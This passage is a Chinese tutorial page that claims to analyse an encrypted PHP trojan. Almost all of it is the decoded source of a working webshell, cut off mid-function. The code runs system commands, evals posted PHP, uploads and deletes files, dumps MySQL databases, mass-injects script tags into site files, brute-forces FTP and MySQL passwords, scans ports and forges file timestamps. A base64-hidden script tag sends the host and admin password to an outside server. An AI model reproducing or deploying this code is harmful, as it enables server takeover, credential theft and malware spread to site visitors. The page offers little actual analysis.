当前位置: 首页 > 图文教程 > 网络编程 > PHP > php 木马的分析(加密破解)

PHP
php 多线程上下文中安全写文件实现代码
PHP类的使用 实例代码讲解
用php实现让页面只能被百度gogole蜘蛛访问的方法
php 学习笔记
PHP编程过程中需要了解的this,self,parent的区别
php 操作excel文件的方法小结
使用PHP获取网络文件的实现代码
PHP 巧用数组降低程序的时间复杂度
php下将XML转换为数组
php 文件上传代码(限制jpg文件)
php 无极分类(递归)实现代码
PHP 采集获取指定网址的内容
PHP 将图片按创建时间进行分类存储的实现代码
PHP 存储文本换行实现方法
PHP 批量更新网页内容实现代码
用PHP查询搜索引擎排名位置的代码
用php实现的获取网页中的图片并保存到本地的代码
php实现首页链接查询 友情链接检查的代码
处理php自动反斜杠的函数代码
php实现的遍历文件夹下所有文件,编辑删除

PHP 中的 php 木马的分析(加密破解)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 179 ::
收藏到网摘: n/a

前一段时间上网查找到了一个经过“加密”过的php木马,出于好奇就对其代码进行了分析 分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,所以写出如下php程序对其进行解码,解压缩,写入文件。
解码解压缩代码如下:
复制代码 代码如下:

<?php
function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>

然后在php的环境下进行运行,会得到php明文文件如下:
复制代码 代码如下:

error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//非安全模式可以使用上面的函数,超时取消。
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";
// 如果需要密码验证,请修改登陆密码
//默认端口表
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//跳转用的秒
$admin['jumpsecond'] = "1";
//Ftp破解用的连接端口
$alexa = "yes";
//是否显示alexa排名,yes或是no
$admin['ftpport'] = "21";
// 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no)
$retime = "no";
// 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定)
$cmd = "cmd.exe";
// 下面是phpspy显示版权那栏的,因为被很多程序当成作为关键词杀了,鱼寒~~允许自定义吧。还是不懂别改~~
/*===================== 配置结束 =====================*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "<span style="\" style="\""font-size: 12px; font-family: Verdana\">注销成功......<p><a href="\" href="\""".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>";exit;}
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
//mix.dll的代码
$mixdll = "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";
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";exit;
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!";
echo"当前进程用户名:$user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit;
}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = '数据库连接失败: ' . mysql_error();
}else{
$query="select load_file('".$filename."');";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = "读取失败,可能是文件不存在或是没file权限。<br>".mysql_error();
}else{
while ($row = mysql_fetch_array($result)) {
$filename = basename($filename);
if($rardown=="yes"){
$zip = NEW Zip;
$zipfiles[]=Array("$filename",$row[0]);
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$filename = "".$filename.".rar";
}else{
$code = $row[0];
}
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=$filename");
echo($code);
exit;
}
}
}
}
// 在线代理
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style="\" style="\""font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";exit;
}
// 下载文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script type="text/javascript"><!--
alert('你要下的文件不存在!')
// --></script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]);
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href="\" href="\""?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href="\" href="\""?action=reg\">注册表操作</a>" : "";
$tb = new FORMS;
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css"><!--
body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
font-family: "Verdana", "Tahoma", "宋体";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
--></style><style type="text/css" bogus="1">body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
font-family: "Verdana", "Tahoma", "宋体";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked; }}
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}}
</SCRIPT>
</head>
<title><?php echo"$myneme"?></title>
<body style="table-layout:fixed; word-break:break-all onmouseover=" style="table-layout:fixed; word-break:break-all onmouseover="window.status='设计:幽月 仅限于网站管理员安全检测用,请务使用于非法用途,后果作者概不负责';return true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<center>
<?php
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?dir='.$dirpath.'" href="?dir='.$dirpath.'">根目录</a> | <a href="?action=dir" href="?action=dir">Shell目录</a> | <a href="?action=phpenv" href="?action=phpenv">环境变量</a> | <a href="?action=proxy" href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell" href="?action=shell">WebShell</a> | <a href="?action=crack" href="?action=crack">杂项破解</a> | <a href="?action=mix" href="?action=mix">解压mix.dll</a> | <a href="?action=logout" href="?action=logout">注销登录</a>');
$tb->tdbody('<a href="?action=plgm" href="?action=plgm">批量挂马</a> | <a href="?action=downloads" href="?action=downloads">Http文件下载</a> | <a href="?action=search&dir='.$dir.'" href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval" href="?action=eval">执行php脚本</a> | <a href="?action=sql" href="?action=sql">执行SQL语句</a> | <a href="?action=mysqlfun" href="?action=mysqlfun">Func反弹Shell</a> | <a href="?action=sqlbak" href="?action=sqlbak">MySQL备份</a> | <a href="?action=SUExp" href="?action=SUExp">Serv-U提权</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit')));
$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!";
} else {
echo basename($delfile)." 文件已不存在!";
}
}
// 删除目录
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir 目录已不存在!";
} else {
echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!";
}
}
// 创建目录
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "该目录已存在!";
} else {
echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!";
@chmod("$mkdirs",0777);
}
}
}
// 上传文件
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!";
}
elseif($action=="mysqlup"){
$filename = $_FILES['upfile']['tmp_name'];
if(!$filename) {
echo"没有选择要上传的文件。。";
}else{
$shell = file_get_contents($filename);
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo "登陆失败".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo"操作成功.文件成功上传到".$host.",文件名为".$uppath."/".$upname."..";
}else{
echo"上传失败 原因:".mysql_error();
}
}
}
}
elseif($action=="mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// 编辑文件
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename";
@$fp=fopen("$filename","w");
if($_POST['change']=="yes"){
$filecontent = "?".">".$_POST['filecontent']."<?";
$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "<?php\n/*\n代码由浅蓝的辐射鱼加密!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>";
}else{
$filecontent = $_POST['filecontent'];
}
echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
if($retime=="yes"){
echo" 鱼鱼自动操作:";
echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!";
}
} else {
echo "请输入想要编辑的文件名!";
}
}
//文件下载
elseif ($_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo"无法读取要下载的数据";
}
elseif(file_exists($path)){
echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if(!file_exists($_POST['mixto'])){
$tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w");
echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吧?!";
fclose($fp);
}else{
echo"不是吧?".$_POST['mixto']."已经存在了耶~";
}
}
// 编辑文件属性
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!";
echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "请输入想要设置的属性!";
}
}
// 文件改名
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." 已经存在,请重新输入一个!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!";
}
} else {
echo "请输入想要改的文件名!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"<span class=\"redfont\">查找关键词:[".$oldkey."],下面显示查找的结果:";
if($type2 == "getpath"){
echo"鼠标移到结果文件上会有部分截取显示.";
}
echo"</span><br><hr width=\"775\" noshade>";
find($path);
}else{
echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?";
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "<script src="http://127.0.0.1" src="http://127.0.0.1"></script>";
$tb->tableheader();
$tb->formheader($action,'批量挂马');
$tb->tdbody('网站批量挂马程序php版','center');
$tb->tdbody('文件位置: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>要挂代码:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','批量挂马').'<br>'.$tb->makeinput('submit','开始挂马','','submit'),'center','1','35');
echo "</form>";
$tb->tablefooter();
}//end plgm
// 克隆时间
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "要参照的文件不存在!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
// 自定义时间
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count($tmp);
for($i=$first;$i<$count;$i++){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>";
}
}
/*
这里代码写得很杂,说实话我自己都不知道写了什么。
好在能用,我就没管了,假设有人看到干脆重写吧。*/
elseif ($do == 'crack') {//反正注册为全局变量了。
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if($turn>$tt or $onetime>$count){
echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。";
}else{
$first = $onetime*($turn-1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$t = "获取".$user."的密码为".$tmp[$i]."";
}
}
if(!$t){
echo "<meta http-equiv=\"refresh\" content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span style="\" style="\""font-size: 12px; font-family: Verdana\"><a href="\" href="\""".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\">字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探. >>></a><br>全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。</span>";
}
else {
echo"$t";
}
}
}else{
echo"字典文件不存在,请确定。";
}
}
elseif($do =='port'){
if(!eregi("-",$port)){
$tmp = explode(",",$port);
$count = count($tmp);
$first = "1";
}else{
$tmp = explode("-",$port);
$first = $tmp[0];
$count = $tmp[1];
}
for($i=$first;$i<$count;$i++){
if(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>";
}else{
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$i."<br>";
}
}
}
// 连接MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
mysql_close();
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error();
mysql_close();
}
// 备份操作
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "请选择欲备份的数据表和备份方式!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "数据库已成功备份到 <a href="\" href="\""".$path."\" target=\"_blank\">".$path."</a>";
mysql_close();
} else {
echo "备份失败,请确认目标文件夹是否具有可写权限!";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/".$dl[0];
$array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d=0;
for($i=0;$i<$count;$i++) {
if($array[$i][folder]==0) {
if($zip->Extract($zipfile,$path,$i)>0) $f++;
}
else $d++;
}
if($i==$f+$d) echo "$dl[0] 解压到".$path."成功<br>($f 个文件 $d 个目录)";
elseif($f==0) echo "$dl[0] 解压到".$path."失败";
else echo "$dl[0] 未解压完整<br>(已解压 $f 个文件 $d 个目录)";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
{
$zipfile=$dir."/".$dl[$k];
if(is_dir($zipfile))
{
unset($zipfilearray);
addziparray($dl[$k]);
for($i=0;$zipfilearray[$i];$i++)
{
$filename=$zipfilearray[$i];
$filesize=@filesize($dir."/".$zipfilearray[$i]);
$fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."/upload/tech/20091012/20091012020852_3df1d4b96d8976ff5986393e8767f5b2.zip");
echo $code;
exit;
}else{
